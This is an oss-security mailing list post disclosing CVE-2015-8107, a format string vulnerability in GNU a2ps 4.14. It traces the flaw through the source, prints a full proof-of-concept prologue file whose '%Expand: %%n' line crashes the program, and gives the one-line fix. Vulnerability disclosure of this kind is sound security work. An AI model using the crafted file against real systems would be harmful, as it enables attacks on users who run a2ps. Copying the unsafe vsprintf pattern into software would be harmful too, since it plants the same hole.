Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Nov 2015 19:24:18 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability

Dear List,

I am writing this to report a format string vulnerability in a2ps. 
(4.14, which is the latest version)
Also I already have been assigned a CVE identifier from MITRE 
"CVE-2015-8107", so I want to make public this vulnerability.

- Target Platform
   Linux
- Target Version
   4.14 (Latest Version)

- Vulnerability description
When user runs a2ps with malicious crafted pro(a2ps prologue) file, an 
attacker can execute arbitrary code.
The function output_file processes the %Expand command in pro file.
The variable `expansion' in the function output_file may hold a 
malicious input string, which can be used as a format argument of vsprintf.

-- Step 1. (ouput.c 524 line)

524     expansion = ((char *)
                          expand_user_string (job, FIRST_FILE (job),
                                (const uchar *) "Expand: requirement",
                                (const uchar *) token));

For instance, the variable expansion will point to the string “%n” when 
a text line "%Expand: %%\n” exists in an input pro file.

-- Step 2. (output.c 525 line)

525    output (dest, expansion);

output() is called in line 525, and the argument `expansion' is used as 
a format string, which can be malicious, as we described in step 1.

-- Step 3. (output.c 873 line)
182    void output (struct output * out, const char *format, ...){
      ...
202   ds_unsafe_cat_vsprintf (out->chunk,format, args);
      ...

The variable format, which can be malicious, can be passed to 
ds_unsafe_cat_vsprintf() in line 202.

-- step 4. (dstring.c 321 line)
321    void ds_unsafe_cat_vsprintf (struct dstring * ds, const char 
*format, va_list args){
       ...
326    vsprintf (ds->content + ds->len, format, args);
       ...

The value of format, which can be malicious, is used as an argument of 
vsprintf in line 326, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.pro"
===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%

%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.
%
Documentation
The layout is the same as samp(bw)samp, but alternating gray and white 
lines.
There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of white
and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3.
EndDocumentation
% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr
%%BeginResource: procset a2ps-matrix-Prolog 2.0 1

% Function T(ab), jumps to the n-th tabulation in the current line
/T {
  cw mul x0 add y0 moveto
} bind def

% Function n: move to the next line
/n { %def
  /y0 y0 bfs sub store
  % Draw a grey background
  /nline nline 1 add def
% @@...@...@...@...@...@...@...@...@...@...@...@...@@
% @@...@...@...@ Malicious user input @@...@...@...@@
%Expand: %%n
% @@...@...@...@...@...@...@...@...@...@...@...@...@@

%Expand:  nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
    gsave
      newpath
      x v get y0 currentfont /Descent get currentfontsize mul add moveto
      pw 0 rlineto
      0 bfs rlineto
      pw neg 0 rlineto
      closepath
      0.9 setgray
      fill
    grestore
  } if
  x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N {
  Show
  n
} bind def

/S {
  Show
} bind def

/p {
  false UL
  false BX
%Face: Plain Courier bfs
  Show
} bind def

/sy {
  false UL
  false BX
%Face: Symbol Symbol bfs
  Show
} bind def

/k {
  false UL
  false BX
%Face: Keyword Courier-Oblique bfs
  Show
} bind def

/K {
  false UL
  false BX
%Face: Keyword_strong Courier-Bold bfs
  Show
} bind def

/c {
  false UL
  false BX
%Face: Comment Courier-Oblique bfs
  Show
} bind def

/C {
  false UL
  false BX
%Face: Comment_strong Courier-BoldOblique bfs
  Show
} bind def

/l {
  false UL
  false BX
%Face: Label Helvetica bfs
  Show
} bind def

/L {
  false UL
  false BX
%Face: Label_strong Helvetica-Bold bfs
  Show
} bind def

/str{
  false UL
  false BX
%Face: String Times-Roman bfs
  Show
} bind def

/e{
  false UL
  true BX
%Face: Error Helvetica-Bold bfs
  Show
} bind def

%%EndResource
%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================

Execute
===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How to fix
(output.c 525 line)
525    output (dest, expansion); ===> output (dest, "%s", expansion);

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. 
Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked 
for a a2ps source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the 
absence of fatal bugs in C source. Sparrow is designed by Abstract 
Interpretation and the analysis is sound in design. Sparrow adopts a 
number of well-founded static analysis techniques[2,3] for scalability, 
precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo 
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like 
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun 
Yi. PLDI'12

Sincerely, Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ